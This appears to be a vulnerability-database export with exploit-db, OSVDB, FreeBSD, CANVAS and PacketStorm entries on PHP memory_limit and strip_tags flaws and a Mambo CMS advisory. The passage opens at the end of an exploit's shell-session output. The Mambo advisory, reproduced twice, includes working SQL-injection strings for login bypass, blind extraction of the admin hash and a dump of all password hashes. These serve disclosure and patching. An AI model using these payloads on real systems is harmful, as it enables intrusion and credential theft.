memlimit in _zval_copy_ctor after ALLOC_HASHTABLE\r\n *\r\n * \r\n[root@localhost stuff]# ./cool\r\nStage 1: Filling mem with bad pdestructor ... DONE\r\nStage 2: Triggering mem_limit now ... DONE\r\nShell on port 36864\r\n[root@localhost stuff]# telnet 127.0.0.1 36864\r\nTrying 127.0.0.1...\r\nConnected to localhost.localdomain (127.0.0.1).\r\nEscape character is '^]'.\r\nid;\r\nuid=99(nobody) gid=4294967295 groups=4294967295\r\nuname -a;\r\nLinux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux\r\n*/\r\n\r\n\n\n// milw0rm.com [2004-11-27]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/660/"}, {"lastseen": "2018-01-24T14:28:59", "bulletinFamily": "exploit", "description": "Mambo < 4.5.3h - Multiple Vulnerabilities. CVE-2006-0871,CVE-2006-1794. Webapps exploit for PHP platform", "modified": "2016-02-24T00:00:00", "published": "2016-02-24T00:00:00", "id": "EDB-ID:43835", "href": "https://www.exploit-db.com/exploits/43835/", "type": "exploitdb", "title": "Mambo < 4.5.3h - Multiple Vulnerabilities", "sourceData": "Mambo Multiple Vulnerabilities\r\n\r\nVendor: Miro International Pty Ltd\r\nProduct: Mambo\r\nVersion: <= 4.5.3h\r\nWebsite: http://www.mamboserver.com\r\n\r\nBID: 16775 \r\nCVE: CVE-2006-0871 CVE-2006-1794 \r\nOSVDB: 23402 23503 23505 \r\nSECUNIA: 18935 \r\nPACKETSTORM: 44191 \r\n\r\nDescription:\r\nMambo is a popular Open Source Content Management System released under the GNU General Public license (GNU GPL). There are a number of security issues in Mambo which allows for SQL Injection, Authentication Bypass, and possible remote code execution via local file inclusion. There has been an updated version of Mambo released and all users are advised to upgrade as soon as possible. Also, please note that these vulnerabilities are NOT related to any worms currently taking advantage of vulnerable Mambo installations. \r\n\r\n\r\nSQL Injection:\r\nThere are several SQL Injection issues in Mambo Open Source. The easiest to exploit of the issues allows an attacker to login as any user. The only info the attacker has to have is the target username (if no user is specified, the first user from the users table will be selected instead). \r\n\r\nfunction login( $username=null,$passwd=null ) {\r\nglobal $acl;\r\n\r\n$usercookie = mosGetParam( $_COOKIE, 'usercookie', '' );\r\n$sessioncookie = mosGetParam( $_COOKIE, 'sessioncookie', '' );\r\nif (!$username || !$passwd) {\r\n\t$username = trim( mosGetParam( $_POST, 'username', '' ) );\r\n\t$passwd = trim( mosGetParam( $_POST, 'passwd', '' ) );\r\n\t$passwd = md5( $passwd );\r\n\t$bypost = 1;\r\n}\r\n$remember = trim( mosGetParam( $_POST, 'remember', '' ) );\r\n\r\nif (!$username || !$passwd) {\r\n\techo \"\\n\";\r\n\texit();\r\n} else {\r\n\t$this->_db->setQuery( \"SELECT id, gid, block, usertype\"\r\n\t. \"\\nFROM #__users\"\r\n\t. \"\\nWHERE username='$username' AND password='$passwd'\"\r\n\t);\r\n\t$row = null;\r\n\tif ($this->_db->loadObject( $row )) {\r\n\t\tif ($row->block == 1) {\r\n\t\t\techo \"\\n\";\r\n\t\t\texit();\r\n\t\t}\r\n\t\t// fudge the group stuff\r\n\t\t$grp = $acl->getAroGroup( $row->id );\r\n\t\t$row->gid = 1;\r\n\r\n\t\tif ($acl->is_group_child_of( $grp->name, 'Registered', 'ARO' ) ||\r\n\t\t$acl->is_group_child_of( $grp->name, 'Public Backend', 'ARO' )) {\r\n\t\t\t// fudge Authors, Editors, Publishers and Super Administrators \r\n\t\t\tinto the Special Group\r\n\t\t\t$row->gid = 2;\r\n\t\t}\r\n\r\nThe above code is from mosMainFrame class (/includes/mambo.php) and is the source of the previously mentioned problem. The function mosGetParam() for the most part just imports GPC variables, and has no real effective filtering or the like, so several variables shown above contain unsanitized data. These variables include $username, which is shortly thereafter passed to the query, thus allowing a user to bypass a login by supplying a username of \"user'/*\" and any password. This is a very serious issue, but should prove easy to fix by either adding better filtering in the mosGetParam() or sanitizing the data within the login() function, or both. If a malicious user is able to use this vulnerability to gain admin privileges then it is pretty much game over as an attacker could then upload, and install a malicious module and execute any php code of their choice on the server. \r\n\r\nAnother issue with Mambo Open Source is data passed to the mosMenuCheck() function is usually unsanitized in regards to the $task parameter. \r\nfunction mosMenuCheck( $Itemid, $menu_option, $task, $gid ) {\r\nglobal $database;\r\n$dblink=\"index.php?option=$menu_option\";\r\nif ($Itemid!=\"\" && $Itemid!=0) {\r\n\t$database->setQuery( \"SELECT access FROM #__menu WHERE id='$Itemid'\" );\r\n} else {\r\n\tif ($task!=\"\") {\r\n\t\t$dblink.=\"&task=$task\";\r\n\t}\r\n\t$database->setQuery( \"SELECT access FROM #__menu WHERE link like '$dblink%'\" );\r\n}\r\n$results = $database->loadObjectList();\r\n$access = 0;\r\n//echo \"\r\n\"; print_r($results); echo \"\r\n\";\r\nforeach ($results as $result) {\r\n\t$access = max( $access, $result->access );\r\n}\r\nreturn ($access <= $gid);\r\n}\r\n\r\nAs seen in the above code the unsanitized $task variable will be used in the query as long as $Itemid is empty. \r\n\r\nhttp://mambo/index2.php?option=com_content&task=-99'%20UNION%20SELECT%201%20FROM%20\r\n\r\nmos_users%20WHERE%20username='admin'%20AND%20MID(password,1,1)='2'/*&id=24&Itemid=0\r\n\r\nIf the first character from the password hash belonging to the user \"admin\" is two as specified above then Mambo displays the error \"You need to login\". This is an easy issue to exploit, and unfortunately mosMenuCheck() is called in the same unsafe manner from other files as well. Last but not least there is an SQL Injection issue in the \"com_content\" component, particularly the showCategory() function. \r\n\r\n// get the total number of published items in the category\r\n// filter functionality\r\n$filter = trim( mosGetParam( $_POST, 'filter', '' ) );\r\n$filter = strtolower( $filter );\r\n$and = '';\r\nif ( $filter ) {\r\n\tif ( $params->get( 'filter' ) ) {\r\n\t\tswitch ( $params->get( 'filter_type' ) ) {\r\n\t\t\tcase 'title':\r\n\t\t\t\t$and = \"\\n AND LOWER( a.title ) LIKE '%\". $filter .\"%'\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'author':\r\n\t\t\t\t$and = \"\\n AND ( ( LOWER( u.name ) LIKE '%\". $filter .\"%' ) OR \r\n\t\t\t\t( LOWER( a.created_by_alias ) LIKE '%\". $filter .\"%' ) )\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'hits':\r\n\t\t\t\t$and = \"\\n AND a.hits LIKE '%\". $filter .\"%'\";\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\nAs you can see from the above code, the $filter variable is passed to the query completely unsanitized, and allows for easy to exploit SQL Injection. This is very dangerous. \r\n\r\nfilter=' UNION SELECT 1,2,3,4,CONCAT(username,CHAR(58),password),6,7,8,9,1 FROM mos_users \r\nWHERE 1/*&order=rdate&limit=10&id=0\u00c2\u00a7ionid=&task=category&option=com_content \r\n\r\nThe above data sent in a post request to the vulnerable script will effectively dump every single username and password hash in the database to the attacker. It should be noted that the above attacks are only effective in the default php enviornment of magic_quotes_gpc off \r\n\r\n\r\nArbitrary File Inclusion:\r\nIt is possible to include arbitrary local files, and ultimately execute code within the vulnerable Mambo Open Source installation. The problem lies in the _setTemplate() function not properly sanitizing GPC data. \r\n\r\n// TemplateChooser Start\r\n$mos_user_template = mosGetParam( $_COOKIE, 'mos_user_template', '' );\r\n$mos_change_template = mosGetParam( $_REQUEST, 'mos_change_template', $mos_user_template );\r\nif ($mos_change_template) {\r\n\t// check that template exists in case it was deleted\r\n\tif (file_exists( \"$mosConfig_absolute_path/templates/$mos_change_template/index.php\" )) {\r\n\t\t$lifetime = 60*10;\r\n\t\t$cur_template = $mos_change_template;\r\n\t\tsetcookie( \"mos_user_template\", \"$mos_change_template\", time()+$lifetime);\r\n\t} else {\r\n\t\tsetcookie( \"mos_user_template\", \"\", time()-3600 );\r\n\t}\r\n}\r\n\r\nAs seen in the above code, there are several unsanitized variables introduced into the function, and $mos_change_template in particular is ultimately set as the current template and used through out the application. There are never any effective traversal checks, so we can include arbitrary locations on the local machine, and in some cases execute arbitrary code as long as the file is named index.php (i.e. /tmp/index.php) The reason for the restrictions are because of the strip_tags call in mosGetParam, but some older versions of php do not use a binary safe strip_tags (CAN-2004-0595) which allows for null characters. So, in those cases the file inclusion is much more dangerous and easy to exploit. \r\n\r\n\r\nSolution:\r\nThere has been a new version of the Mambo software released to fix the previously mentioned vulnerabilities. \r\n\r\nhttp://mamboxchange.com/frs/?group_id=5 \r\n\r\nThe above link contains all of the relative patches as well as the secured full releases. Users are encouraged to upgrade their Mambo installations as soon as possible. \r\n\r\n\r\nCredits:\r\nJames Bercegay of the GulfTech Security Research Team", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43835/"}], "freebsd": [{"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "unix", "description": "\nStefan Esser of e-matters discovered that PHP's strip_tags()\n\t function would ignore certain characters during parsing of tags,\n\t allowing these tags to pass through. Select browsers could then\n\t parse these tags, possibly allowing cross-site scripting attacks.\n", "modified": "2013-06-19T00:00:00", "published": "2004-07-07T00:00:00", "id": "EDF61C61-0F07-11D9-8393-000103CCF9D6", "href": "https://vuxml.freebsd.org/freebsd/edf61c61-0f07-11d9-8393-000103ccf9d6.html", "title": "php -- strip_tags cross-site scripting vulnerability", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "unix", "description": "\nStefan Esser of e-matters discovered a condition within PHP\n\t that may lead to remote execution of arbitrary code.\tThe\n\t memory_limit facility is used to notify functions when memory\n\t contraints have been met. Under certain conditions, the entry\n\t into this facility is able to interrupt functions such as\n\t zend_hash_init() at locations not suitable for interruption.\n\t The result would leave these functions in a vulnerable state.\n\nAn attacker that is able to trigger the memory_limit abort\n\t within zend_hash_init() and is additionally able to control\n\t the heap before the HashTable itself is allocated, is able to\n\t supply his own HashTable destructor pointer. [...]\nAll mentioned places outside of the extensions are quite easy\n\t to exploit, because the memory allocation up to those places\n\t is deterministic and quite static throughout different PHP\n\t versions. [...]\nBecause the exploit itself consist of supplying an arbitrary\n\t destructor pointer this bug is exploitable on any platform.\n\n", "modified": "2004-10-02T00:00:00", "published": "2004-07-07T00:00:00", "id": "DD7AA4F1-102F-11D9-8A8A-000C41E2CDAD", "href": "https://vuxml.freebsd.org/freebsd/dd7aa4f1-102f-11d9-8a8a-000c41e2cdad.html", "title": "php -- memory_limit related vulnerability", "type": "freebsd", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T17:19:31", "bulletinFamily": "exploit", "description": "**Name**| php_limit \n---|--- \n**CVE**| CVE-2004-0594 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| php_limit \n**Notes**| CVE Name: CVE-2004-0594 \nVENDOR: PHP \nOSVDB: \nRepeatability: Multiple tries \nReferences: http://security.e-matters.de/advisories/112004.html \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594 \nDate public: 2004/07/14 \nCVSS: 5.1 \n\n", "modified": "2004-07-27T04:00:00", "published": "2004-07-27T04:00:00", "id": "PHP_LIMIT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/php_limit", "title": "Immunity Canvas: PHP_LIMIT", "type": "canvas", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP strip_tags() function contains a flaw that may allow a malicious user to conduct a cross site scripting attack. The issue is triggered when the strip_tags()function fails to strip obfuscated HTML tags. It is possible that the flaw may result in a loss of integrity.\n## Solution Description\nUpgrade to PHP version 4.3.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP strip_tags() function contains a flaw that may allow a malicious user to conduct a cross site scripting attack. The issue is triggered when the strip_tags()function fails to strip obfuscated HTML tags. It is possible that the flaw may result in a loss of integrity.\n## References:\nVendor URL: http://www.php.net\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-13.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:068)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000847)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_21_php4.html)\n[Secunia Advisory ID:12064](https://secuniaresearch.flexerasoftware.com/advisories/12064/)\n[Secunia Advisory ID:12081](https://secuniaresearch.flexerasoftware.com/advisories/12081/)\n[Secunia Advisory ID:12078](https://secuniaresearch.flexerasoftware.com/advisories/12078/)\n[Secunia Advisory ID:12149](https://secuniaresearch.flexerasoftware.com/advisories/12149/)\n[Secunia Advisory ID:12244](https://secuniaresearch.flexerasoftware.com/advisories/12244/)\n[Secunia Advisory ID:14167](https://secuniaresearch.flexerasoftware.com/advisories/14167/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:12073](https://secuniaresearch.flexerasoftware.com/advisories/12073/)\n[Secunia Advisory ID:12106](https://secuniaresearch.flexerasoftware.com/advisories/12106/)\n[Secunia Advisory ID:12113](https://secuniaresearch.flexerasoftware.com/advisories/12113/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:14828](https://secuniaresearch.flexerasoftware.com/advisories/14828/)\n[Secunia Advisory ID:12070](https://secuniaresearch.flexerasoftware.com/advisories/12070/)\n[Secunia Advisory ID:12116](https://secuniaresearch.flexerasoftware.com/advisories/12116/)\n[Related OSVDB ID: 7870](https://vulners.com/osvdb/OSVDB:7870)\nRedHat RHSA: RHSA-2004:395-10\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00133.html\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.437272\nOther Advisory URL: http://www.securiteam.com/unixfocus/5UP0C15DFI.html\nOther Advisory URL: http://security.e-matters.de/advisories/122004.html\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01064\nOther Advisory URL: http://www.debian.org/security/2005/dsa-669\nOther Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480\n[Nessus Plugin ID:13650](https://vulners.com/search?query=pluginID:13650)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0135.html\nKeyword: SCOSA-2005.49\nISS X-Force ID: 16692\n[CVE-2004-0595](https://vulners.com/cve/CVE-2004-0595)\n", "modified": "2004-07-13T17:55:25", "published": "2004-07-13T17:55:25", "href": "https://vulners.com/osvdb/OSVDB:7871", "id": "OSVDB:7871", "type": "osvdb", "title": "PHP strip_tags() Function Filter Bypass", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "description": "## Vulnerability Description\nThe PHP memory_limit function contains a flaw that may allow a malicious user to remotely execute arbitrary code. The issue is triggered when an attacker is able to trigger the memory_limit abort within the zend_hash_init() function. It is possible that the flaw may allow the attacker to control the heap, resulting in a loss of confidentiality, integrity, and/or availability.\n## Solution Description\nUpgrade to version 4.3.8 or 5.0.0 or higher, as it has been reported to fix this vulnerability.\n## Short Description\nThe PHP memory_limit function contains a flaw that may allow a malicious user to remotely execute arbitrary code. The issue is triggered when an attacker is able to trigger the memory_limit abort within the zend_hash_init() function. It is possible that the flaw may allow the attacker to control the heap, resulting in a loss of confidentiality, integrity, and/or availability.\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200407-13.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:068)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000847)\n[Vendor Specific Advisory URL](http://www.suse.de/de/security/2004_21_php4.html)\n[Vendor Specific Advisory URL](http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBOV01083)\n[Secunia Advisory ID:12064](https://secuniaresearch.flexerasoftware.com/advisories/12064/)\n[Secunia Advisory ID:12081](https://secuniaresearch.flexerasoftware.com/advisories/12081/)\n[Secunia Advisory ID:12078](https://secuniaresearch.flexerasoftware.com/advisories/12078/)\n[Secunia Advisory ID:12149](https://secuniaresearch.flexerasoftware.com/advisories/12149/)\n[Secunia Advisory ID:12244](https://secuniaresearch.flexerasoftware.com/advisories/12244/)\n[Secunia Advisory ID:14167](https://secuniaresearch.flexerasoftware.com/advisories/14167/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:12073](https://secuniaresearch.flexerasoftware.com/advisories/12073/)\n[Secunia Advisory ID:12106](https://secuniaresearch.flexerasoftware.com/advisories/12106/)\n[Secunia Advisory ID:12113](https://secuniaresearch.flexerasoftware.com/advisories/12113/)\n[Secunia Advisory ID:13027](https://secuniaresearch.flexerasoftware.com/advisories/13027/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:12070](https://secuniaresearch.flexerasoftware.com/advisories/12070/)\n[Secunia Advisory ID:12116](https://secuniaresearch.flexerasoftware.com/advisories/12116/)\n[Related OSVDB ID: 7871](https://vulners.com/osvdb/OSVDB:7871)\nRedHat RHSA: RHSA-2004:395-10\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00133.html\nOther Advisory URL: http://security.e-matters.de/advisories/112004.html\nOther Advisory URL: http://www4.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01064\nOther Advisory URL: http://www.debian.org/security/2005/dsa-669\nOther Advisory URL: http://www.securiteam.com/unixfocus/5VP0D15DFO.html\nOther Advisory URL: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480\n[Nessus Plugin ID:13650](https://vulners.com/search?query=pluginID:13650)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0138.html\nKeyword: SCOSA-2005.49\nGeneric Exploit URL: http://www.felinemenace.org/~gyan/phpnolimit.c\n[CVE-2004-0594](https://vulners.com/cve/CVE-2004-0594)\n", "modified": "2004-07-14T07:39:05", "published": "2004-07-14T07:39:05", "href": "https://vulners.com/osvdb/OSVDB:7870", "id": "OSVDB:7870", "type": "osvdb", "title": "PHP memory_limit Function Arbitrary Code Execution", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:05", "bulletinFamily": "exploit", "description": "", "modified": "2006-02-26T00:00:00", "published": "2006-02-26T00:00:00", "href": "https://packetstormsecurity.com/files/44191/mambo453.txt.html", "id": "PACKETSTORM:44191", "type": "packetstorm", "title": "mambo453.txt", "sourceData": "`########################################################## \n# GulfTech Security Research February 24, 2006 \n########################################################## \n# Vendor : Miro International Pty Ltd \n# URL : http://www.mamboserver.com/ \n# Version : Mambo <= 4.5.3h \n# Risk : Multiple Vulnerabilities \n########################################################## \n \n \n \nDescription: \nMambo is a popular Open Source Content Management System \nreleased under the GNU General Public license (GNU GPL). \nThere are a number of security issues in Mambo which allows \nfor SQL Injection, Authentication Bypass, and possible remote \ncode execution via local file inclusion. There has been an \nupdated version of Mambo released and all users are advised \nto upgrade as soon as possible. Also, please note that these \nvulnerabilities are NOT related to any worms currently taking \nadvantage of vulnerable Mambo installations. \n \n \n \nSQL Injection: \nThere are several SQL Injection issues in Mambo Open Source. \nThe easiest to exploit of the issues allows an attacker to \nlogin as any user. The only info the attacker has to have is \nthe target username (if no user is specified, the first user \nfrom the users table will be selected instead). \n \n \nfunction login( $username=null,$passwd=null ) { \nglobal $acl; \n \n$usercookie = mosGetParam( $_COOKIE, 'usercookie', '' ); \n$sessioncookie = mosGetParam( $_COOKIE, 'sessioncookie', '' ); \nif (!$username || !$passwd) { \n$username = trim( mosGetParam( $_POST, 'username', '' ) ); \n$passwd = trim( mosGetParam( $_POST, 'passwd', '' ) ); \n$passwd = md5( $passwd ); \n$bypost = 1; \n} \n$remember = trim( mosGetParam( $_POST, 'remember', '' ) ); \n \nif (!$username || !$passwd) { \necho \"<script> alert(\\\"\"._LOGIN_INCOMPLETE.\"\\\"); window. \nhistory.go(-1); </script>\\n\"; \nexit(); \n} else { \n$this->_db->setQuery( \"SELECT id, gid, block, usertype\" \n. \"\\nFROM #__users\" \n. \"\\nWHERE username='$username' AND password='$passwd'\" \n); \n$row = null; \nif ($this->_db->loadObject( $row )) { \nif ($row->block == 1) { \necho \"<script>alert(\\\"\"._LOGIN_BLOCKED.\"\\\"); window. \nhistory.go(-1); </script>\\n\"; \nexit(); \n} \n// fudge the group stuff \n$grp = $acl->getAroGroup( $row->id ); \n$row->gid = 1; \n \nif ($acl->is_group_child_of( $grp->name, 'Registered', 'ARO' ) || \n$acl->is_group_child_of( $grp->name, 'Public Backend', 'ARO' )) { \n// fudge Authors, Editors, Publishers and Super Administrators \ninto the Special Group \n$row->gid = 2; \n} \n \n \nThe above code is from mosMainFrame class (/includes/mambo.php) \nand is the source of the previously mentioned problem. The \nfunction mosGetParam() for the most part just imports GPC \nvariables, and has no real effective filtering or the like, so \nseveral variables shown above contain unsanitized data. These \nvariables include $username, which is shortly thereafter passed \nto the query, thus allowing a user to bypass a login by supplying \na username of \"user'/*\" and any password. This is a very serious \nissue, but should prove easy to fix by either adding better \nfiltering in the mosGetParam() or sanitizing the data within the \nlogin() function, or both. If a malicious user is able to use this \nvulnerability to gain admin privileges then it is pretty much \ngame over as an attacker could then upload, and install a malicious \nmodule and execute any php code of their choice on the server. \n \nAnother issue with Mambo Open Source is data passed to the \nmosMenuCheck() function is usually unsanitized in regards to the \n$task parameter. \n \nfunction mosMenuCheck( $Itemid, $menu_option, $task, $gid ) { \nglobal $database; \n$dblink=\"index.php?option=$menu_option\"; \nif ($Itemid!=\"\" && $Itemid!=0) { \n$database->setQuery( \"SELECT access FROM #__menu WHERE id='$Itemid'\" ); \n} else { \nif ($task!=\"\") { \n$dblink.=\"&task=$task\"; \n} \n$database->setQuery( \"SELECT access FROM #__menu WHERE link like \n'$dblink%'\" ); \n} \n$results = $database->loadObjectList(); \n$access = 0; \n//echo \"<pre>\"; print_r($results); echo \"</pre>\"; \nforeach ($results as $result) { \n$access = max( $access, $result->access ); \n} \nreturn ($access <= $gid); \n} \n \nAs seen in the above code the unsanitized $task variable will be \nused in the query as long as $Itemid is empty. \n \nhttp://mambo/index2.php?option=com_content&task=-99'%20UNION%20SELECT%201%20FROM%20 \nmos_users%20WHERE%20username='admin'%20AND%20MID(password,1,1)='2'/*&id=24&Itemid=0 \n \nIf the first character from the password hash belonging to the \nuser \"admin\" is two as specified above then Mambo displays the \nerror \"You need to login\". This is an easy issue to exploit, \nand unfortunately mosMenuCheck() is called in the same unsafe \nmanner from other files as well. Last but not least there is an \nSQL Injection issue in the \"com_content\" component, particularly \nthe showCategory() function. \n \n// get the total number of published items in the category \n// filter functionality \n$filter = trim( mosGetParam( $_POST, 'filter', '' ) ); \n$filter = strtolower( $filter ); \n$and = ''; \nif ( $filter ) { \nif ( $params->get( 'filter' ) ) { \nswitch ( $params->get( 'filter_type' ) ) { \ncase 'title': \n$and = \"\\n AND LOWER( a.title ) LIKE '%\". $filter .\"%'\"; \nbreak; \ncase 'author': \n$and = \"\\n AND ( ( LOWER( u.name ) LIKE '%\". $filter .\"%' ) OR \n( LOWER( a.created_by_alias ) LIKE '%\". $filter .\"%' ) )\"; \nbreak; \ncase 'hits': \n$and = \"\\n AND a.hits LIKE '%\". $filter .\"%'\"; \nbreak; \n} \n} \n \n} \n \nAs you can see from the above code, the $filter variable is passed \nto the query completely unsanitized, and allows for easy to exploit \nSQL Injection. This is very dangerous. \n \nfilter=' UNION SELECT \n1,2,3,4,CONCAT(username,CHAR(58),password),6,7,8,9,1 FROM mos_users \nWHERE \n1/*&order=rdate&limit=10&id=0§ionid=&task=category&option=com_content \n \nThe above data sent in a post request to the vulnerable script will \neffectively dump every single username and password hash in the \ndatabase to the attacker. It should be noted that the above attacks are \nonly effective in the default php enviornment of magic_quotes_gpc off \n \n \n \nArbitrary File Inclusion: \nIt is possible to include arbitrary local files, and ultimately execute \ncode within the vulnerable Mambo Open Source installation. The problem \nlies in the _setTemplate() function not properly sanitizing GPC data. \n \n// TemplateChooser Start \n$mos_user_template = mosGetParam( $_COOKIE, 'mos_user_template', '' ); \n$mos_change_template = mosGetParam( $_REQUEST, 'mos_change_template', \n$mos_user_template ); \nif ($mos_change_template) { \n// check that template exists in case it was deleted \nif (file_exists( \n\"$mosConfig_absolute_path/templates/$mos_change_template/index.php\" )) { \n$lifetime = 60*10; \n$cur_template = $mos_change_template; \nsetcookie( \"mos_user_template\", \"$mos_change_template\", time()+$lifetime); \n} else { \nsetcookie( \"mos_user_template\", \"\", time()-3600 ); \n} \n} \n \nAs seen in the above code, there are several unsanitized variables \nintroduced into the function, and $mos_change_template in particular \nis ultimately set as the current template and used through out the \napplication. There are never any effective traversal checks, so we \ncan include arbitrary locations on the local machine, and in some \ncases execute arbitrary code as long as the file is named index.php \n(i.e. /tmp/index.php) The reason for the restrictions are because \nof the strip_tags call in mosGetParam, but some older versions of php \ndo not use a binary safe strip_tags (CAN-2004-0595) which allows for \nnull characters. So, in those cases the file inclusion is much more \ndangerous and easy to exploit. \n \n \n \nSolution: \nThere has been a new version of the Mambo software released to fix \nthe previously mentioned vulnerabilities. \n \nhttp://mamboxchange.com/frs/?group_id=5 \n \nThe above link contains all of the relative patches as well as the \nsecured full releases. Users are encouraged to upgrade their Mambo \ninstallations as soon as possible. \n \n \n \nCredits: \nJames Bercegay of the GulfTech Security Research Team \n \n \n \nRelated Info: \nThe original advisory can be found at the following location \nhttp://www.gulftech.org/?node=research&article_id=00104-02242006 \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/44191/mambo453.txt"}]}